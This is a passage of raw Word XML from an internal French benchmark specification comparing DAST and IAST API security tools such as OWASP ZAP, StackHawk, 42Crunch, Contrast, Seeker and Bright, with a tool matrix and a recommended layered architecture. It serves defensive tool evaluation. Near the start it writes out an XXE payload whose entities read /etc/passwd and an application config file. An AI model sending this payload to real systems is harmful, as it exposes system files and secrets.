              </w:rPr>
              <w:t xml:space="preserve">Content-Type: application/xml</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;!DOCTYPE payments [</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;!ENTITY xxe2 SYSTEM "file:///opt/app/config/application.properties"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">]&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;payments&gt;&lt;payment&gt;&lt;amount&gt;100&lt;/amount&gt;&lt;description&gt;&amp;xxe;&lt;/description&gt;&lt;/payment&gt;&lt;/payments&gt;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DAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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IAST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Detecte ?</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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3713"/>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OUI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Comment</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Soumet des payloads XXE (file://, http:// OOB, expect://) sur tous les endpoints XML. Detection : (1) contenu de fichier dans la reponse ; (2) requete OOB sortante. CWE-611, CVSS 7.5.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Detecte l'usage de parseurs XML sans configuration securisee : SAXParserFactory sans setFeature(DISALLOW_DOCTYPE_DECL, true), DocumentBuilderFactory sans setFeature(EXTERNAL_GENERAL_ENTITIES, false).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:fill="1F4E79" w:val="clear"/>
        <w:spacing w:after="200" w:before="440"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Annexe B — Recommandations pour le Benchmark</w:t>
      </w:r>
    </w:p>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B.1   Matrice de selection des outils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100"/>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="13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Pond.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OWASP ZAP</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StackHawk</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42Crunch</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Contrast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Seeker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Bright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Couverture OWASP API Top10</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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Complete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IAST multi-langages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Non</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Java,.NET,Go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Java,Py,Node</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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Java,Node,Py</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Gestion FP persistante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Basique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Avancee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API-centric</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Avancee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Avancee</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Avancee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Templates rapport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Basique</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Config.</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Integration GitLab</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Via script</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Native</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Via API</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Native</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Via script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Native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Token refresh mid-scan</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Manuel</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1326"/>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Auto</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Cout / Open Source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1100"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="AAAAAA" w:sz="1"/>
              <w:left w:val="single" w:color="AAAAAA" w:sz="1"/>
              <w:bottom w:val="single" w:color="AAAAAA" w:sz="1"/>
              <w:right w:val="single" w:color="AAAAAA" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D9EAD3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E6B3C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Gratuit</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Commercial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>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Commercial</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Premium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="AAAAAA" w:sz="1"/>
              <w:left w:val="single" w:color="AAAAAA" w:sz="1"/>
              <w:bottom w:val="single" w:color="AAAAAA" w:sz="1"/>
              <w:right w:val="single" w:color="AAAAAA" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4CCCC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9C1B1B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Premium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1326"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="AAAAAA" w:sz="1"/>
              <w:left w:val="single" w:color="AAAAAA" w:sz="1"/>
              <w:bottom w:val="single" w:color="AAAAAA" w:sz="1"/>
              <w:right w:val="single" w:color="AAAAAA" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FCE5CD" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F4F24"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Commercial</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="140" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">B.2   Architecture cible recommandee - 5 couches sans angle mort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44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Outil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 qu'il detecte que les autres ne font pas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 + Reachability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SDepend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Vulnerabilites dans les dependances tierces + confirmation que la methode vulnerable est reellement appelee (angle mort DAST + IAST)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SonarQube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Vulnerabilites dans le code source sans execution (injection, hardcoded secrets, logic flaws)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IAST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Seeker / Contrast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 (test)</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Vulnerabilites confirmees par execution reelle, zero FP structurel, tous langages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CI/CD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StackHawk / ZAP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STAGING</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Surface d'attaque externe, misconfiguration, auth bypass, sans acces au code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DAST On-Demand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Bright / 42Crunch</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 (passif)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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APIs non documentees, shadow APIs, drift de configuration post-deploiement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
              <w:left w:val="single" w:color="1E6B3C" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E6B3C" w:sz="1"/>
              <w:right w:val="single" w:color="1E6B3C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D9EAD3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="555555"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Conclusion : DAST et IAST sont complementaires. IAST detecte les vulnerabilites dans le code execute (BUILD). DAST detecte les problemes de surface externe (RUN). SDepend/SCA detecte les risques dans les dependances. Les trois couches ensemble avec SonarQube constituent une couverture sans angle mort.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="2E75B6" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Document a usage interne - Classification C2 Restreint - PSC26 - DEB_SecuAPI - Mai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666666"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">DEB_SecuAPI - PSC26 - Mai 2026 - v4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PSC26 - Benchmark DAST/IAST - Exigences Fonctionnelles &amp; Techniques</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="CC0000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">  |  C2 Restreint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2026-05-12T13:26:11.269Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-12T13:26:11.284Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>